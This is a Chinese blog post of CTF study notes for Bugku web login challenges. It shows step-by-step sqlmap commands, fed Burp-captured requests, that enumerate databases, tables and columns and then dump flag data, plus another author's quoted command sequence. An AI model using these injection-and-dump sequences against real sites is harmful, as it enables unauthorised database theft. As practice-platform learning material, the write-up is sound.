• [bugku]sqlmap部分


    例题目录

    [根据校赛的经验来看的话  这种登录的可以先用sqlmap搞一下....]

     然后做一个新的web题目  可以先给自己预留5min看会不会解, 不要上来就翻答案n

    就5min, 可以两个题,先做题,再补题。

    其他的,在哪里学习可以换地方,早点起吧,不要让思维僵化了

    例题1:这是一个神奇的登录框 

    sqlmap要结合burp一起使用; 

    首先啊是抓包,然后保存下来到txt里(直接burp抓了右键copy to file 就好了)

    然后开始使用sqlmap(直接在我桌面上就有那个文件)

    sqlmap.py -r "D:1.txt" -p admin_name --dbs

    解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字

    (admin_name  是在源代码里面找到的..)

    (我那个是bat文件  所以要加一个"python")

    多试验一下吧,一路选择“Y”,开始并不行,最后好像还是可了:

    我们来重复一下那个命令: python sqlmap.py -r "......5.txt"  -p admin_name --dbs

    然后继续包bugkusql1这个表

    sqlmap.py -r "D:1.txt" -D bugkusql1 -p admin_name --tables

    解释:-D是表示选择了后面的这个数据库 --tables是想获取表

    还记得吗  -p 是参数的意思

    很快找到两个表 

    继续  sqlmap.py -r "D:1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

    解释类似上面 不过加了一个-T 指定表 (在表里面继续找adin_name)

    这样的话哇 哇  

    flag1这个列 最后查字段 命令:sqlmap.py -r "D:1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

    解释:同上面 --dump是获取字段的命令

    【关系】数据库--dbs(-D)  到 表名 --tables (-T)  到列名 --columns (-C)  最后--dump

    然后命令的话直接回车  

    哇 然后就对了......   还是很神奇的 

     例题2: 成绩单

     ……? 以前写过? 还写了博客?完全不记得了.....

    再重新来一遍吧....

    好 于是一样的话:  python sqlmap.py -r "C:Usersmol74Desktophacku1022.txt" -p id --dbs( 因为在源代码里那个是id )

    找到了那个什么  

    这个是数据库 继续-d

    [(改这俩地方就好啦)【修改的时候 -D (数据库名字) 后面是  --tables】(真的1 后面就是表了 然后列... )

    注意缩进 python里面用的就是严格的缩进 然后就是这里起码你空格要搞对 才能区分开鸭  )

    妈也 感觉是一样的套路....

    然后后面大部分选择yes吧....  (这比javaweb要简单吧  我tm)....

    后面好像有点慢....  然后  wtm  no found

     后面似乎就不行了....哇 然后发现是因为我zz  表名字写错了

    不然怎么可能找不到呢?前面表示在这个表里面  再找直接就好了哇

    最后直接dump  到手 哇嘎嘎嘎嘎嘎嘎嘎!

    有两个表啊 自己判断在哪里

    ====别人的: 

    2.依次执行如下命令,得到最终的结果:

    sqlmap.py -r C:UsersICBCDesktoppost.txt                                                            //判断是否存在SQL注入漏洞
    sqlmap.py -r C:UsersICBCDesktoppost.txt --current-db                                            //查询当前数据库
    sqlmap.py -r C:UsersICBCDesktoppost.txt -D skctf --tables                                        //查询**数据库有哪些数据表
    sqlmap.py -r C:UsersICBCDesktoppost.txt -D skctf -T fl4g --columns                                //查询**数据库**数据表有哪些列
    sqlmap.py -r C:UsersICBCDesktoppost.txt -D skctf -T fl4g C skctf_flag --dump                    //查询**数据库**数据表**列的内容
    ---------------------

    这里写错了... 那个是skctf_flag 


    原文:https://blog.csdn.net/johnlxj/article/details/82153355

     https://blog.csdn.net/qq_40424939/article/details/80775500?utm_source=blogxgwz2

    这里整理的很好..  我也不想学了 好累

    ----------题外话

    我觉得acm当时对我来说真的很痛苦的吧

    划水的时间太长 错一点小地方  然后总是那个想修修补补 而不是重新开始的心态 什么都写的很慢

    我也最多在题意和xx上蹦跶了  当个散户的话锻炼脑子 没事的时候鼓捣一下也挺好  w

    就这样吧 不放弃 还能干吗

  • 相关阅读:
    Luogu P4002 [清华集训2017]生成树计数
    Luogu P3978 [TJOI2015]概率论
    Codechef JADUGAR2 Chef and Same Old Recurrence 2
    Codechef TREDEG Trees and Degrees
    一些有趣的数
    有向图上Euler回路计数
    P5105 不强制在线的动态快速排序
    二分图小结
    BZOJ2648: SJY摆棋子
    P3231 [HNOI2013]消毒
  • 原文地址:https://www.cnblogs.com/lx2331/p/9829182.html
Copyright © 2020-2023  润新知